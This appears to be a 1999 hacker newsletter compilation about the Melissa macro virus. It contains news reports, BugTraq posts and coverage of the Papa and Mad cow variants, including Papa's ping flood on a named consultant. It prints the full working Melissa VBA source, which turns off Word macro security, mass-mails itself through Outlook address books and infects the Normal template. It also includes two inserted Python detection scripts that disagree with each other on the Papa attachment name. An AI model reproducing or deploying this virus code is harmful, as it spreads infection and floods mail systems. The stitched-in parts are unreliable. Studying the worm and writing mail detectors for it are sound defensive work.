Nando Times....http://www.techserver.com/story/body/0,1634,32453-52253-387209-0,00.html


The Forbes and Nando Times stories follow:


From Forbes
http://www.forbes.com/tool/html/99/mar/0326/side1.htm

Porn virus hits
Corporate America

By Adam L. Penenberg with Elizabeth Corcoran

A number of companies--including Microsoft,
Compaq, Intel and Boeing--have been infected by
a new computer virus that attacks users of the
Microsoft Outlook E-mail program. The virus,
dubbed "Melissa," was first cataloged today, March 26,
by McAfee on its web site.

The virus is spreading rapidly and, because of its design,
is jamming E-mail gateways and causing system
administrators to shut down. Since the virus was
uncorked just before the weekend, when IT staff are
away from work, the full extent of the damage may not
be known for some time, although it is certain that
many more companies--and individuals--will fall victim.

If you are listed in someone's Outlook Express address
book, and he is infected, then you could be affected--if
you open the attached MSWord file.

"Getting rid of this will take a long time, because it only
takes one message to start it all over again," says Barry
Wadman, president of C-Systems, an E-commerce
designer. "I venture to say that this will be affecting
and or infecting the net for at least a couple of weeks."

Intel, according to PR manager Tom Waldrop, has
ordered those who have received the virus to shut
down their machines. "The IT staff is working hard to
make sure that infected machines are cleaned
appropriately," he says.


"It is certain that many more
companies will fall victim."


Melissa is a Word Macro Virus that is spread when a
user opens an attached Microsoft Word file. Upon
activation, it looks for Outlook--Microsoft's E-mail,
newsreader and personal information manager--creates
a message, and sends it to the first 50 people listed in
the user's address book. Each message contains the
subject: "Important Message From (Your User Name)."
The body of the E-mail simply says, "Here is that
document you asked for ... don't show anyone else ;-)"

When users click on the attached file, they unleash the
virus. The attached file contains a list of 300 porno
sites--passed on as if the sender is pointing people to
XXX porno sites. It also modifies the normal template in
MS Word, infecting every new document that the user
creates with Word.

The virus is not malevolent, meaning it does not destroy
or alter data, or trash hard drives. But it is fiendish
because of the intense volume of E-mail it produces,
which is causing networks to choke. Only users of
Microsoft Outlook are affected by the Melissa virus.
Macintosh users and those using other E-mail programs
have nothing to worry about.

"In the past people have always been told not to open
attachments that come from people you do not know,"
says Space Rogue, publisher of Hacker News Network
and a member of L0pht Heavy Industries, a
Boston-based hacker think tank. "Well, here is a virus
that is sent as an attachment from someone you do
know."

The Melissa virus seems to be one of the few with a
utilitarian purpose. Since the virus spreads so quickly, it
"would definitely be a great spam vehicle," says Dildog,
another member of L0pht.

Most spam points recipients at porn sites and
get-rich-quick scams. That typical spam is easily traced
back to its source, since the spammer usually includes a
web site, phone number or E-mail address. But the
Melissa virus, by automatically spewing out a list of 300
sites, makes tracing the creator extremely difficult.

Comments inside the virus include:

'WORD/Melissa written by Kwyjibo

'Works in both Word 2000 and Word 97

'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!

'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

The best way to stop the virus? Be suspicious of mail
with attachments and the subject line: "Important
Message From (Your User Name)"


From Nando Times;
http://www.techserver.com/story/body/0,1634,32453-52253-387209-0,00.html

'Melissa' virus hits Internet

Copyright © 1999 Nando Media
Copyright © 1999 Reuters News Service

By DICK SATRAN

SAN FRANCISCO (March 28, 1999 4:34 p.m. EST http://www.nandotimes.com)
- A virus that spreads via e-mail hit computers over the weekend and
threatened havoc Monday as workers return to offices and begin opening
messages sent over the Internet.

The virus, called "Melissa," comes in the form of a document that lists
pornography sites on the World Wide Web.

Computer experts said the virus was aimed at widely used Microsoft
Windows-based e-mail address book software, Outlook and Outlook
Express, and it can send up to 50 additional versions of the e-mail to
other users, threatening a widespread infection of computer systems.

That could create a flood of unwanted e-mails around the Internet as the
program perpetuates itself using pre-programmed "macros," software
embedded in the Windows operating system that sets off complex computer
functions with one command.

"It could grow explosively and shut down e-mail systems as a side effect,"
Eric Allman, co-founder of the Emeryville, Calif.-based Sendmail, a
widely used provider of e-mail services, said in an interview Sunday.

A number of leading software security firms and academic experts posted
warnings about the e-mail threat, including Network Associates, the
leading anti-virus software maker.

"Melissa is widely reported and spreading quickly via mass e-mail, a
function of the viral infection," said Network Associates based in Santa
Clara, Calif.

Carnegie Mellon University's Software Engineering Institute issued an
advisory, which said, "The number and variety of reports we have received
indicate that this is a widespread attack affecting a variety of sites."

The only damage the virus causes is that it replicates itself and creates
a flood of e-mail, though it apparently does not hurt the computer itself,
experts said.

The real danger is that the virus will overwhelm the server computers that
handle computer messaging systems, which could lead to system shutdowns as
each e-mail multiplies itself 50 times. Already, a wave of the e-mails has
been sent out and awaits office workers Monday morning.

"It's not doing malicious things or removing files or anything like that,"
Allman said. "I've heard claims that it has been doing more but I haven't
seen any substantial verification of that. It's really more of a wake-up call,
that shows us how you could take a malicious virulent virus and
reproduce it all over the place very quickly."

Computer experts warned users to be wary of documents sent from any senders
asking them to open up a file for Microsoft Word. That file, in turn, asks for
a prompt asking users whether they want to initiate a "macro," and requires
users to approve its use. Those checkoffs make it
relatively easy to avoid the problem.

Microsoft itself has simply warned users to "be careful about what runs on their
machine," the New York Times reported. Carnegie Mellon said,
"our analysis indicates that human action (in the form of a user opening an
infected Word document) is required for this virus to activate."

The virus can be identified, Network Associates said, because it will read
"Important Message From Application.UserName." The body of the text reads "Here
is that document you asked for ... don't show anyone else" and contains a list of
pornographic Web sites.

Melissa creates the following entry in the registry:
HKEY_CURRENT_USER\Software\Microsoft\Office\"Melissa?"

Network Security said that to avoid the risk of contracting the Melissa virus,
"it is recommended that network administrators and users upgrade their anti-virus
software to include detection and cleaning for W97M/Melissa."

Network Security posted information about the virus on the Web site of its
Avert Labs division, Sendmail also posted advice on the Melissa problem at
http://www.sendmail.com and Carnegie Mellon posted information on its Web site as
well.

Computer experts said that if advisories were followed, the problem would probably
not become a widespread worry.

"I suspect we'll see a day or two of extremely high e-mail loads and then it will
just die out, so in some sense this virus is not that critical but it's one that
demonstrates what could happen if a truly malicious virus were released," Sendmail's
Allman said. "The ability to spread something so
broadly is scary."


FBI, experts search for elusive author of 'Melissa' virus

March 30, 1999
Web posted at: 10:47 p.m. EST (0347 GMT)
http://www.cnn.com/TECH/computing/9903/30/virus.tracker/index.html


WASHINGTON (CNN) -- Several mutations of the computer virus
known as Melissa surfaced Tuesday, although experts said they were not as
effective as the original in clogging e-mail systems.

The FBI has launched an investigation into the fast-spreading virus, which
first appeared last Friday and spread rapidly around the world by Monday.

The agency estimated that the virus has affected "thousands of computer
users" at more than 100 companies and government agencies.

"I urge e-mail users to exercise caution when reading their e-mail for the next
few days and to bring unusual messages to the attention of their system
administrator," said Michael A. Vatis, director of the FBI's National
Infrastructure Protection Center (NIPC).

NIPC is a multiagency unit focusing on threats to the nation's infrastructure,
including computers and telephone, electric and water systems.

The Melissa virus spreads via Microsoft's widely used Word 97 and Word
2000 documents which can be attached to e-mail messages.

The Melissa virus comes in the form of e-mail, usually containing the subject
line "Important Message." It appears to be from a friend or colleague.

The body of the e-mail message says, "Here is that document you asked for
... don't show it to anyone else" with a winking smiley face formed by the
punctuation marks ;-).

Attached to the message is a Microsoft Word document file that lists
Internet pornography sites. Once the user opens that file, the virus digs into
the user's Microsoft Outlook address book and sends infected documents
to the first 50 addresses.

Computer sleuth tracks down virus source

As the virus swamped one computer system after another over the
weekend, software developer Richard Smith followed a trail of electronic
fingerprints left by Melissa.

"This electronic fingerprint is basically the serial number of your computer.
So what I was curious about is whether it would be possible to use the serial
number in the Melissa document ... to track down the author," said Smith,
who runs Phar Lap Software, a small Cambridge, Massachusetts, software
firm that makes operating systems and software tools.

Smith posted his "digital fingerprinting" theory on an Internet discussion
group Friday. He received an e-mail from a college student in Sweden who
pointed out similarities between Melissa and older viruses written by a
computer user known as "VicodinES."

Smith was familiar with other work attributed to the notorious VicodinES,
named after the painkiller drug Vicodin. The same user had posted
so-called "virus creation tool kits" on the Web.

"In about 30 percent of those files, I found that same fingerprint number, the
same serial number that was in the Melissa virus ... at a minimum, we know
that the Melissa virus and these tool kits were created on the same
computer," Smith said.

Threat remains

Smith said he turned his findings over to the FBI, who regard the
transmission of the virus as a criminal matter.

But the biggest impact of the Melissa virus appeared to be the temporary
shutdown of massive computer systems by cautious managers.

Computer giants Microsoft and Intel were among those who received copies
of the tainted note, as did Lucent Technologies, the world's largest
communications equipment maker.

And although anti-virus software programs have so far been successful in
containing Melissa, experts fear its variants will be corrected and distributed
by copycat virus writers.

Indeed, a potentially more damaging virus code-named "Papa" emerged on
Monday. The new virus is a more elaborate program that uses the same
e-mail system as Melissa.

Correspondent Marsha Walton, The Associated Press and Reuters contributed to this
report.


@HWA


12.1 The Melissa macro virus code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Fri, 26 Mar 1999 17:05:51 -0800
From: Aleph One <aleph1@UNDERGROUND.ORG>
To: BUGTRAQ@netspace.org
Subject: Melissa Macro Virus

I normally don't allow virus posts through the list as they seldom represent
a new threat, just a new example of an already existing one, but this one
is getting enough play to warrant a message.

There is a new Word macro virus circulating called Melissa. The virus
propagates via email. Attached to the email is a Word file that when
opened will launch a macro that will send the same message to the first
50 recipients of your Outlook address book. The subject line is
"important Message From <some user name>". The body consists of the text
"Here is that document you asked for... don't show anyone else;-)".
The infected document contains passwords to porn web sites.

For more information check out: http://vil.mcafee.com/vil/vm10120.asp

As this thing is emailing itself to everyone under the sun virus vendors
should have no problem obtaining copies to analyze. If anyone wants a copy
send me a message.


--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 18:01:13 -0800
From: Nate Lawson <nate@ROOT.ORG>
To: BUGTRAQ@netspace.org
Subject: Melissa virus code

Sorry to add one more message to this. I placed the code up on my site,
formatted so that it is readable.

http://www.root.org/

-Nate

[http://www.root.org/melissa_virus.txt]


from: http://www.root.org/melissa_virus.txt


Private Sub Document_Open()
    On Error Resume Next
    ' Word 2000 keeps the macro security level in the registry; Word 97 uses Options.*
    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
        CommandBars("Macro").Controls("Security...").Enabled = False
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    Else
        CommandBars("Tools").Controls("Macro").Enabled = False
        Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
    End If

    ' Mass-mail stage: runs once per machine, gated on the "Melissa?" registry marker
    Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
    Set UngaDasOutlook = CreateObject("Outlook.Application")
    Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
    If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
        If UngaDasOutlook = "Outlook" Then
            DasMapiName.Logon "profile", "password"
            For y = 1 To DasMapiName.AddressLists.Count
                Set AddyBook = DasMapiName.AddressLists(y)
                x = 1
                Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
                For oo = 1 To AddyBook.AddressEntries.Count
                    Peep = AddyBook.AddressEntries(x)
                    BreakUmOffASlice.Recipients.Add Peep
                    x = x + 1
                    If x > 50 Then oo = AddyBook.AddressEntries.Count
                Next oo
                BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
                BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
                BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
                BreakUmOffASlice.Send
                Peep = ""
            Next y
            DasMapiName.Logoff
        End If
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
    End If

    ' Infection stage: copy the macro between the active document and the Normal template
    Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
    Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
    NTCL = NTI1.CodeModule.CountOfLines
    ADCL = ADI1.CodeModule.CountOfLines
    BGN = 2
    If ADI1.Name <> "Melissa" Then
        If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
        Set ToInfect = ADI1
        ADI1.Name = "Melissa"
        DoAD = True
    End If

    If NTI1.Name <> "Melissa" Then
        If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
        Set ToInfect = NTI1
        NTI1.Name = "Melissa"
        DoNT = True
    End If

    If DoNT <> True And DoAD <> True Then GoTo CYA

    If DoNT = True Then
        Do While ADI1.CodeModule.Lines(1, 1) = ""
            ADI1.CodeModule.DeleteLines 1
        Loop
        ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
        Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
            ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
            BGN = BGN + 1
        Loop
    End If

    If DoAD = True Then
        Do While NTI1.CodeModule.Lines(1, 1) = ""
            NTI1.CodeModule.DeleteLines 1
        Loop
        ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
        Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
            ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
            BGN = BGN + 1
        Loop
    End If

CYA:

    If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
    ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
        ActiveDocument.Saved = True
    End If

    'WORD/Melissa written by Kwyjibo
    'Works in both Word 2000 and Word 97
    'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
    'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

    ' Payload: only fires when the day of the month equals the current minute
    If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub
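The articles in this issue and the source above give the same three indicators for each family (a fixed subject line, a fixed body text, and a document attachment), which is what a mail gateway could key on. The following triage routine is an added example written for this issue, not code from any of the posts or from the virus source; it parses wire-format messages, flags a mail only when all three indicators of one family match, and uses a mailbox, sender addresses and family labels constructed for the example. The Mad cow and Papa signatures are taken from the variant reports later in this section.

```python
"""Gateway-side triage for the Melissa-family mail described in this issue.

Added example, not part of the original posts or of the virus source.
Indicators are the ones reported on this page for Melissa, the "Mad cow
joke" variant and Papa; the mailbox below is constructed, not real traffic.
"""
import re
from collections import Counter
from email import message_from_bytes, policy
from email.message import EmailMessage

# One signature per family: (subject pattern, body text, attachment name).
# A message is flagged only when all three match, so a legitimate
# "Important Message From ..." mail without the body text and document
# attachment is not blocked.
SIGNATURES = {
    "W97M/Melissa": (
        re.compile(r"^Important Message From ", re.I),
        "here is that document you asked for",
        re.compile(r"\.doc$", re.I),
    ),
    "Mad cow joke": (
        re.compile(r"^Mad cow joke$", re.I),
        "beware of the speed of the mad cow",
        re.compile(r"^madcow\.doc$", re.I),
    ),
    "Papa": (
        re.compile(r"^Fwd: Workbook from all\.net and Fred Cohen$", re.I),
        "urgent info inside",
        re.compile(r"^path\.xls$", re.I),
    ),
}


def classify(msg: EmailMessage):
    """Return the family name when a parsed message matches a signature, else None."""
    subject = str(msg.get("Subject", ""))
    text_part = msg.get_body(preferencelist=("plain",))
    text = text_part.get_content().lower() if text_part is not None else ""
    names = [part.get_filename() or "" for part in msg.iter_attachments()]
    for family, (subject_re, body_needle, attach_re) in SIGNATURES.items():
        if (subject_re.search(subject)
                and body_needle in text
                and any(attach_re.search(name) for name in names)):
            return family
    return None


def classify_raw(raw: bytes):
    """Parse one message in wire format (as a gateway receives it) and classify it."""
    return classify(message_from_bytes(raw, policy=policy.default))


def triage(raw_messages):
    """Count hits per family over a batch of raw messages."""
    counts = Counter()
    for raw in raw_messages:
        family = classify_raw(raw)
        if family is not None:
            counts[family] += 1
    return dict(counts)


def build(sender, subject, body, attachment=None):
    """Helper for the constructed mailbox: produce one message as bytes."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = "user@example.org"
    msg["Subject"] = subject
    msg.set_content(body)
    if attachment is not None:
        # Stand-in blob; in a real incident this is the infected document itself.
        msg.add_attachment(b"constructed stand-in, not a real document",
                           maintype="application", subtype="octet-stream",
                           filename=attachment)
    return msg.as_bytes()


# Constructed mailbox: three hits and two legitimate mails (one of which
# shares the Melissa subject prefix but nothing else).
SAMPLE_MAILBOX = [
    build("alice@example.org", "Important Message From Alice Example",
          "Here is that document you asked for ... don't show anyone else ;-)",
          "list.doc"),
    build("bob@example.org", "Mad cow joke",
          "beware of the speed of the Mad cow", "madcow.doc"),
    build("carol@example.org", "Fwd: Workbook from all.net and Fred Cohen",
          "Urgent info inside. Disregard macro warning.", "path.xls"),
    build("dave@example.org", "Important Message From Dave",
          "Minutes from Friday's call are attached.", "minutes.txt"),
    build("erin@example.org", "Re: lunch", "Noon works for me."),
]

if __name__ == "__main__":
    print(triage(SAMPLE_MAILBOX))  # -> {'W97M/Melissa': 1, 'Mad cow joke': 1, 'Papa': 1}
```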


12.2 PAPA, a new Melissa variant targets specific individual sites with ping flood attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

New Virus Launches Mini Infowar
http://www.internetnews.com/bus-news/article/0,1087,3_89541,00.html
March 30, 1999
By Brian McWilliams
InternetNews.com Correspondent
Business News Archives


A new macro virus based on the infamous Melissa has been released into the wild, and it may be the latest phase in an infowar
between hackers and a security consultant.

According to virus experts, the so-called Papa virus is transmitted in the same manner as Melissa, sending copies of itself to
addresses in a victim's Microsoft Outlook address book.

But while Melissa seemed designed to snarl up computer networks everywhere, Papa targets a specific person, Fred Cohen, a
security consultant in Livermore, Calif.

The virus, which is transmitted by e-mail in a Microsoft Excel file named path.xls, attempts to launch a ping flood on Cohen's web
site at all.net, as well as on the IP address of Cohen's connection to the @Home Network cable Internet access service.

Cohen was among the first in the security community to publicize information about Caligula, a macro virus capable of stealing a
victim's PGP private keyring. PGP is a popular encryption software package.

In a posting to a security mailing list last month, Cohen called on the Internet community to attack the web site of the Codebreakers,
a virus writer's group to which Caligula's author belongs.

Cohen Tuesday confirmed the Papa virus is some sort of retaliation for his actions. But Cohen said there's been collateral damage to
innocent Internet users, including severe performance degradation to the @Home Network.

"It's not an eye for an eye. They're causing damage to the infrastructure and inconvenience to people who get the virus. If they
pester me, I don't care and nobody else cares. But if they take down the infrastructure, they'll go to jail."

@Home Network representatives were not available to confirm whether the attack on Cohen's IP address has impacted
performance of the network.

Many antivirus software vendors have already released updates to detect and clean Papa. Keith Peer, president of Central
Command, distributor of AntiViral ToolKit Pro said Papa is already spreading fast. His firm is receiving dozens of reports every
hour.

@HWA


12.2 PAPA B and MadCow Joke virii variants already becoming widespread
as copycats modify the Melissa code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Yet another variant of the nasty Melissa virus has surfaced on the Internet,
this one with the subject line "Mad cow joke."

Story: http://www.zdnet.com/zdnn/special/melissavirus.html


The new mad cow joke virus is unrelated to other so-called Mad Cow viruses
that have surfaced in the past, according to anti-virus company Trend Micro
Inc. The new virus is similar to Melissa in that it surfaces when users open
a Word document attached to an e-mail, triggering e-mail to the top entries in
an Outlook user's address book.

Unlike Melissa, which sends out 50 messages, this one sends out only 20. Also,
it is a member of a group of viruses known as "class viruses," which store code
in a different -- and harder-to-detect -- portion of a Word document.

'I think it's going to show up affecting people,'
-- Dan Schrader, Trend Micro


The virus comes with a subject line "Mad cow joke," a body containing the words
"beware of the speed of the Mad cow," and an attached file called madcow.doc.

The virus' creator even tipped his or her hat to Melissa. The last lines of
code in the Mad cow virus read: "word/veronicathankstoword/melissaandword/class."


Trend Micro hasn't heard from anybody who's seen the virus in action, but
officials there believe they will shortly. "I think it's going to show up affecting
people," said Dan Schrader, Trend Micro's product manager.


More variations coming

Schrader believes a host of variant viruses will surface in the wake of Melissa.
"We're going to see a lot of them," Schrader said. "It's unfortunate these guys
need to copycat."

Most anti-virus firms have updated their software to ward off variants.

"When viruses become popular, other hackers use them as a roadmap," said Sal
Viveros, group marketing manager for Network Associates Inc.'s
(Nasdaq: NETA) anti-virus products.


Because those roadmaps in the variants are similar to the original virus, most
anti-virus software can detect and exterminate them.


Only a few get through

Most viruses created never reach actual users. Of the 35,000 to 40,000 viruses
created by both researchers and malicious hackers, only 200 to 300 ever pass
through innocent users' computers, according to Symantec Corp. (Nasdaq:
SYMC), another anti-virus firm.

"The vast majority of viruses are not ever deployed or released," said Carey
Nachenberg, chief researcher at Symantec's anti-virus research center.

Although the source code for many viruses is easy to get, making copying them
relatively simple, the ramifications of sending out a virus as destructive as
Melissa discourages many hackers from doing so.

The FBI has launched a widespread search for Melissa's creator, whom officials
said could face as many as 10 years in jail and $350,000 in fines.

Meanwhile, anti-virus researchers also are learning new details of the so-called
Papa virus, a Melissa variant that is carried by Excel documents and sends out
60 e-mails when opened.


Virus warrior a target

The virus contains the subject line "Fwd: Workbook from all.net and Fred Cohen"
and a body reading "Urgent info inside. Disregard macro warning."

The Papa virus first surfaced Monday, but after studying it, researchers found a
glitch that kept it from working, rendering it "sterile."

But Tuesday, someone apparently had fixed that glitch, and the newer, virulent
strain of virus -- "Papa B" -- was reportedly on the loose.

Anti-virus software maker Network Associates said it's had reports of Papa B
hitting at least one Fortune 100 company and two large firms in Europe.

When opened, the virus also pings -- or, repeatedly hits -- two Web sites, one run
by anti-virus expert Fred Cohen, the subject of the virus message, and @Home.

Cohen suspects a group of hackers created the virus to target him because he fingered
them in another virus, which was called Caligula. "They have made threats over the
last several weeks," Cohen said.


Just say 'no'

To protect himself from such attacks, Cohen said he simply says "no" to any attachment
that comes his way.

Still, he believes that Microsoft Corp. cuts too many security corners in Windows,
oversights that could lead to more breaches. The Melissa virus and its variants have
been carried through Microsoft documents.

"We are building a house of cards and it is going to be blown down every so often,"
he said.

ZDNN's Rob Lemos contributed to this story
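The indicators the article reports (subject lines, body text, attachment type) are exactly what a mail gateway would key on while signatures were still catching up. The following is an added example, not code from ZDNet, HWA or any anti-virus vendor: it triages constructed e-mail messages against those published indicators and adds one generic rule for an Office attachment arriving with a "disregard the macro warning" lure. The Papa attachment name "workbook.xls" and the sender/recipient addresses are assumptions; the article gives none.

```python
"""Mail-gateway triage for the Melissa-family indicators reported above.

Added example (not from the ZDNet article, HWA, or any vendor): scores
constructed e-mail messages against the subject, body and attachment
indicators the article gives for the "Mad cow joke" and "Papa" variants,
plus one generic rule for an Office attachment arriving with a
"disregard the macro warning" lure in the body.
"""
from email import message_from_string
from email.message import Message
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

# Indicators quoted in the article; the rule names are ours.
# (rule name, subject substring, body substring, attachment suffixes)
INDICATORS = [
    ("madcow_variant", "mad cow joke",
     "beware of the speed of the mad cow", (".doc",)),
    ("papa_variant", "fwd: workbook from all.net and fred cohen",
     "urgent info inside. disregard macro warning.", (".xls",)),
]
OFFICE_SUFFIXES = (".doc", ".dot", ".xls")


def _attachment_names(msg: Message) -> list:
    return [p.get_filename().lower() for p in msg.walk() if p.get_filename()]


def _body_text(msg: Message) -> str:
    chunks = []
    for part in msg.walk():
        if part.get_content_type() == "text/plain" and not part.get_filename():
            payload = part.get_payload(decode=True)
            if payload:
                chunks.append(payload.decode("utf-8", "replace"))
    return " ".join(chunks).lower()


def triage(raw_message: str) -> list:
    """Return the names of the rules that fire on one RFC 822 message."""
    msg = message_from_string(raw_message)
    subject = (msg.get("Subject") or "").lower()
    body = _body_text(msg)
    attachments = _attachment_names(msg)
    fired = []
    for name, subj_ind, body_ind, suffixes in INDICATORS:
        lure_seen = subj_ind in subject or body_ind in body
        if lure_seen and any(a.endswith(suffixes) for a in attachments):
            fired.append(name)
    # Generic rule: any Office attachment whose cover text coaches the
    # reader past the macro warning is suspicious regardless of variant.
    if any(a.endswith(OFFICE_SUFFIXES) for a in attachments) and "macro warning" in body:
        fired.append("office_macro_lure")
    return fired


def build_sample(subject: str, body: str, attachment_name: str) -> str:
    """Constructed test message; the attachment is placeholder bytes, not a virus."""
    msg = MIMEMultipart()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "recipient@example.invalid"
    msg["Subject"] = subject
    msg.attach(MIMEText(body, "plain"))
    att = MIMEApplication(b"PLACEHOLDER-BYTES", "octet-stream")
    att.add_header("Content-Disposition", "attachment", filename=attachment_name)
    msg.attach(att)
    return msg.as_string()


# Constructed samples using the article's indicator strings.  The Papa
# attachment name "workbook.xls" is our assumption; the article gives none.
MADCOW_SAMPLE = build_sample("Mad cow joke",
                             "beware of the speed of the Mad cow", "madcow.doc")
PAPA_SAMPLE = build_sample("Fwd: Workbook from all.net and Fred Cohen",
                           "Urgent info inside. Disregard macro warning.",
                           "workbook.xls")
BENIGN_SAMPLE = build_sample("Lunch on Friday?", "Agenda attached.", "agenda.doc")

if __name__ == "__main__":
    for label, sample in [("madcow", MADCOW_SAMPLE), ("papa", PAPA_SAMPLE),
                          ("benign", BENIGN_SAMPLE)]:
        print(label, triage(sample))
```

Indicator matching like this is brittle by design (a copycat changes one string and the specific rule goes quiet), which is why the generic lure rule sits beside the variant rules: the article's own point is that the variants reuse the same roadmap.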

@HWA


12.3 Is Microsoft to blame for the Melissa virus and variants?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.latimes.com/HOME/BUSINESS/t000028532.1.html

Security of Microsoft's Products Is Questioned
Technology: Melissa virus is latest attack on firm's software and raises
concerns about its ability to protect customers.
By LESLIE HELM, Times Staff Writer


SEATTLE--The Melissa virus that has been tying up computer systems around
the world is just the latest in a string of attacks on Microsoft software
and has raised questions among security experts about Microsoft's ability
to protect its customers. The security holes in Microsoft's Windows NT,
Office and e-mail software are especially troublesome given those products'
rapid spread throughout the corporate world, in many cases pushing aside
more mature and secure but expensive systems based on Unix.

Microsoft is a popular target for such attacks because the company is
disdained by many hackers and its products are widely used, but experts
say the company has also made its software vulnerable by introducing new
functions before they are properly debugged and not educating consumers
about the potential hazards. Melissa should be particularly worrisome to
computer users and corporate administrators, experts said, because it
represents a new trend in penetrating corporate systems. It attacks the
more vulnerable individual users' desktops rather than taking the more
traditional approach of breaking into central computers that control the
networks. "People are getting at a corporation's information through the
client [desktop]," said a hacker who identified himself as Weld Pond.
"Windows 95 doesn't even have a security model." Pond, a member of L0pht,
a group that has had great success cracking Microsoft software, said
Microsoft's approach to creating mini-programs called macros is an example
of the kind of code that has not been well thought out.

A macro is essentially code that puts the computer through a series of
routines--forwarding an expense report through the proper channels, for
example. The Melissa virus uses that capability to order a computer to send
a list of pornographic Web sites to those listed in a computer's e-mail
address book.

Pond said the problem with Microsoft's approach to security is that
users who receive an e-mail containing a macro are only given the choice
of activating the macro or not activating it. "You can't tell the system
to open the program but don't give it access to my system," Pond said.
By contrast, Pond pointed out that in designing the Java language,
Sun Microsystems used a "sandbox" approach that largely prevents a Java
program downloaded from the Net from interfering with the rest of the
computer's operations. That has all but shut hackers out of using Java
to infect computers.

Joe Wells of Thousand Oaks maintains Wild List, a catalog of active
viruses. Wells said that close to half of all new viruses are hidden inside
macros. "It is by far the fastest-growing group," he said. Microsoft said
it will continue to use macros because they are popular among corporate
users. "Our customers have told us that the macro language is important to
them," said George Meng, group product manager for Microsoft Office.

Meng said consumers can avoid problems by clicking "disable" when
presented with an unfamiliar macro. Meng said future versions of its
Office suite of programs would be designed so network administrators
could screen out macros that don't come from specified sources.

But not all Windows security attacks rely on macros. A hacker group
known as Cult of the Dead Cow released a program last summer called "Back
Orifice" that can be sent to a desktop computer over the Internet, then
used by a hacker to remotely control that computer. In its effort to
promote the use of macros, experts say, Microsoft hasn't done a sufficient
job of warning consumers of security dangers. Since most consumers never
use macros, for example, Microsoft could easily ship Office with the default
setting on "off" for macros, but it doesn't.

"If Microsoft shipped its products with the macros off, we'd probably
all be fine," said Alan Paller, director of research at SANS Institute, a
Bethesda, Md.-based nonprofit group that provides security training. Microsoft
"wants the product to be as powerful as possible," Paller said. "But sometimes
fixing it [for security reasons] hobbles it a little bit." "I don't know what
Microsoft could do other than say "no" to macros, and that is a big issue in
marketing Word," said Matt Bishop, an associate professor of computer science
at UC Davis.

Yaro Charnot, chairman of Institute of Reverse Engineering, a Pasadena-
based security consulting company, said there is a broader problem regarding
Microsoft's attitude toward security. Its e-mail program Outlook, for example,
which was used by Melissa to spread the virus, contains lots of bugs that bring
down the system frequently, making it particularly susceptible to viruses, Charnot
said.

"Every time the computer crashes, that is an opportunity for a hacker
to take over the computer," he said.

Charnot said Microsoft's system for reporting bugs is unfriendly to users,
and the firm seldom acknowledges such reports. Frequently the bug is never fixed,
Charnot said. "It seems as if it is Microsoft policy not to care about security."
Security experts and hackers have repeatedly come up with serious security
holes in Microsoft's Windows NT software. One glitch, for example, allows a hacker
to get into a corporation's computer network, take on the role of network
administrator and get access to users' passwords and files.

Experts say Microsoft's next version of NT could include even more serious
problems because it includes many new lines of code. "It's a no-win situation from
a security perspective," Pond said.

Although Windows' competitors such as the Linux operating system also have
security problems, experts say those problems are easier to find because Linux's
underlying code is open for anybody to look at, unlike Microsoft Windows, which
is proprietary.

Copyright 1999 Los Angeles Times. All Rights Reserved

@HWA


12.4 Melissa makes it aboard ship and stows away
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


From Federal Computer Week:

http://www.fcw.com:80/pubs/fcw/1999/0329/web-ship-3-30-99.html

<a href="Link</a">http://www.fcw.com:80/pubs/fcw/1999/0329/web-ship-3-30-99.html">Link</a>

MARCH 30, 1999 . . . 10:40 EST


Melissa virus stows away aboard Navy ship

